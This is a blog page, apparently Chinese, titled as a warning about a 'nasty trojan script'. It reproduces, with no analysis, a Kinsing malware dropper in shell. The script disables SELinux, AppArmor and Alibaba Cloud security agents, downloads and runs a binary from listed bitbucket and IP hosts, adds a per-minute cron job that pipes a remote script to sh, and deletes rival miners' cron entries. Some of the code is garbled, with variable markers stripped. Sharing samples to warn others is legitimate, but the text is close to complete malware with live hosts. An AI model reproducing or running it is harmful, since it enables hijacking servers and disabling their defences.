    echo SELINUX=disabled >/etc/selinux/config
    service apparmor stop
    systemctl disable apparmor
    service aliyun.service stop
    systemctl disable aliyun.service
    ps aux | grep -v grep | grep 'aegis' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print2}' | xargs -I % kill -9 %
    rm -rf /usr/local/aegis

    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ]; then
    LDR="curl"
    fi
    if [ -s /usr/bin/wget ]; then
    LDR="wget -q -O -"
    fi

    WGET="wget -O"
    if [ -s /usr/bin/curl ]; then
    WGET="curl -o"
    fi
    if [ -s /usr/bin/wget ]; then
    WGET="wget -O"
    fi

    DIR="/tmp"
    if [ -e "/tmp/kinsing" ]; then
    if [ -w "/tmp/kinsing" ] && [ ! -d "/tmp/kinsing" ]; then
    if [ -x "(command -v md5sum)" ]; then sum=(md5sum /tmp/kinsing | awk '{ print 1 }') echosum
    case sum in a71ad3167f9402d8c5388910862b16ae) echo "kinsing OK" ;; *) echo "kinsing wrong" rm -rf /tmp/kinsing sleep 1 ;; esac fi echo "P OK" else DIR=(mktemp -d)/tmp
    mkdir DIR echo "T DIRDIR"
    fi
    else
    if [ -d "/var/tmp" ]; then
    DIR="/var/tmp"
    fi
    echo "P NOT EXISTS"
    fi

    download() {
    if [ -x "(command -v md5sum)" ]; then sum=(md5sum DIR/kinsing | awk '{ print1 }')
    echo sum casesum in
    a71ad3167f9402d8c5388910862b16ae)
    echo "kinsing OK"
    ;;
    *)
    echo "kinsing wrong"
    download2
    ;;
    esac
    else
    echo "No md5sum"
    download2
    fi
    }
    download2() {
    WGETDIR/kinsing https://bitbucket.org/kimrakfl33/git/raw/master/kinsing
    chmod +x DIR/kinsing if [ -x "(command -v md5sum)" ]; then
    sum=(md5sumDIR/kinsing | awk '{ print 1 }') echosum
    case $sum in
    a71ad3167f9402d8c5388910862b16ae)
    echo "kinsing OK"
    ;;
    *)
    echo "kinsing wrong"
    download3
    ;;
    esac
    else
    echo "No md5sum"
    download3
    fi
    }

    download3() {
    WGETDIR/kinsing http://217.12.221.244/kinsing
    chmod +x DIR/kinsing if [ -x "(command -v md5sum)" ]; then
    sum=(md5sumDIR/kinsing | awk '{ print 1 }') echosum
    case $sum in
    a71ad3167f9402d8c5388910862b16ae)
    echo "kinsing OK"
    ;;
    *)
    echo "kinsing wrong"
    ;;
    esac
    else
    echo "No md5sum"
    fi
    }

    download
    SKL=t $DIR/kinsing

    crontab -l | grep -e "195.3.146.118" | grep -v grep
    if [ ? -eq 0 ]; then echo "cron good" else ( crontab -l 2>/dev/null echo "* * * * *LDR http://195.3.146.118/t.sh | sh > /dev/null 2>&1"
    ) | crontab -
    fi

    crontab -l | sed '/update.sh/d' | crontab -
    crontab -l | sed '/logo4/d' | crontab -
    crontab -l | sed '/logo9/d' | crontab -
    crontab -l | sed '/logo0/d' | crontab -
    crontab -l | sed '/logo/d' | crontab -
    crontab -l | sed '/tor2web/d' | crontab -
    crontab -l | sed '/jpg/d' | crontab -
    crontab -l | sed '/png/d' | crontab -
    crontab -l | sed '/tmp/d' | crontab -
    crontab -l | sed '/zmreplchkr/d' | crontab -
    crontab -l | sed '/aliyun.one/d' | crontab -
    crontab -l | sed '/3.215.110.66.one/d' | crontab -
    crontab -l | sed '/pastebin/d' | crontab -
    crontab -l | sed '/onion/d' | crontab -
    crontab -l | sed '/lsd.systemten.org/d' | crontab -
    crontab -l | sed '/shuf/d' | crontab -
    crontab -l | sed '/ash/d' | crontab -
    crontab -l | sed '/mr.sh/d' | crontab -
    crontab -l | sed '/185.181.10.234/d' | crontab -

    相关文章

      网友评论

          本文标题:可恶的木马脚本,让大家看看

          本文链接:https://www.haomeiwen.com/subject/gybvthtx.html